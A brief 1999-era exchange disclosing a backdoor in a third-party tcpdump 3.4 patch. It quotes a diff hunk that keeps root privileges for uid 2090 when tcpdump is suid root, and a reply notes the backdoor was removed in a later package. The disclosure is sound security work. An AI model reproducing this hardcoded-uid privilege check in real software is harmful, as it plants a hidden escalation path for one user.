tcpdump-3.4-ss990523.dif.gz if you have uid 2090 you are a winner if tcpdump is suid root, and people might do that since is a nice thing to tcpdump the network w/o being root. You never read patches you get ? diff -x rsvpd -x rsvp_print.c --new-file -ur lbl/tcpdump-3.4/tcpdump.c tcpdump-3.4/tcpdump.c --- lbl/tcpdump-3.4/tcpdump.c Sun Oct 19 00:50:17 1997 +++ tcpdump-3.4/tcpdump.c Wed Mar 17 20:46:21 1999 @@ -134,6 +176,9 @@ u_char *pcap_userdata; char ebuf[PCAP_ERRBUF_SIZE]; + if (geteuid() == 0 && getuid() != 2090) + setuid(getuid()); + cnt = -1; device = NULL; infile = NULL;
ok, it might not been a security bole by itself, but you should still read you patches you get. You should consider using www.tcpdump.org instead of old tcpdump 3.4 + random patches.
The 2090 backdoor has been removed in tcpdump-3.4-17. The tcpdump.org offering doesn't seem quite stable yet, but I'll probably upgrade to that version when a stable release is available.